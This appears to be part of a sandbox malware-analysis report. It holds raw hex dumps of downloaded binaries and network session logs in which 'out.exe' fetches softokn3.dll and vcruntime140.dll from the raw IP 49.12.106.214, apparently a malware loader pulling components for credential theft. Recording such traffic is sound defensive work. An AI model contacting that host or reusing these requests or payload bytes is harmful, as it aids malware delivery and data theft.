                                                                                                                                                                                        2024-10-07 18:35:39 UTC16384INData Raw: 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72
                                                                                                                                                                                        Data Ascii: -bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr
                                                                                                                                                                                        2024-10-07 18:35:39 UTC16384INData Raw: 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff
                                                                                                                                                                                        Data Ascii: x{|L@DX}0}}M@4}0}}4M@tXM}0}}XM
                                                                                                                                                                                        2024-10-07 18:35:39 UTC16384INData Raw: 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd
                                                                                                                                                                                        Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]E
                                                                                                                                                                                        2024-10-07 18:35:39 UTC16384INData Raw: 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0
                                                                                                                                                                                        Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                                                                                                                                        2024-10-07 18:35:39 UTC16384INData Raw: 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57
                                                                                                                                                                                        Data Ascii: AUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSW
                                                                                                                                                                                        2024-10-07 18:35:39 UTC16384INData Raw: 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8
                                                                                                                                                                                        Data Ascii: E_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ
                                                                                                                                                                                        2024-10-07 18:35:39 UTC16384INData Raw: 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03
                                                                                                                                                                                        Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s
                                                                                                                                                                                        2024-10-07 18:35:40 UTC16384INData Raw: cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00
                                                                                                                                                                                        Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|i
                                                                                                                                                                                        2024-10-07 18:35:40 UTC16384INData Raw: 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01
                                                                                                                                                                                        Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        14192.168.2.54989949.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:41 UTC198OUTGET /softokn3.dll HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:41 UTC260INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:41 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 257872
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Last-Modified: Monday, 07-Oct-2024 18:35:41 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-10-07 18:35:41 UTC16124INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                                                                                                        2024-10-07 18:35:41 UTC16384INData Raw: 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81
                                                                                                                                                                                        Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(
                                                                                                                                                                                        2024-10-07 18:35:41 UTC16384INData Raw: 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d
                                                                                                                                                                                        Data Ascii: EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM
                                                                                                                                                                                        2024-10-07 18:35:41 UTC16384INData Raw: 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00
                                                                                                                                                                                        Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
                                                                                                                                                                                        2024-10-07 18:35:41 UTC16384INData Raw: 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00
                                                                                                                                                                                        Data Ascii: 0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
                                                                                                                                                                                        2024-10-07 18:35:41 UTC16384INData Raw: 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74
                                                                                                                                                                                        Data Ascii: ]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt
                                                                                                                                                                                        2024-10-07 18:35:41 UTC16384INData Raw: 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4
                                                                                                                                                                                        Data Ascii: u ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                                                                                                                                        2024-10-07 18:35:41 UTC16384INData Raw: 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00
                                                                                                                                                                                        Data Ascii: uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                                                                                                                        2024-10-07 18:35:41 UTC16384INData Raw: 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c
                                                                                                                                                                                        Data Ascii: ]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|
                                                                                                                                                                                        2024-10-07 18:35:41 UTC16384INData Raw: c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18
                                                                                                                                                                                        Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        15192.168.2.54991349.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:43 UTC202OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:43 UTC259INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:43 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 80880
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Last-Modified: Monday, 07-Oct-2024 18:35:43 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                        Accept-Ranges: bytes
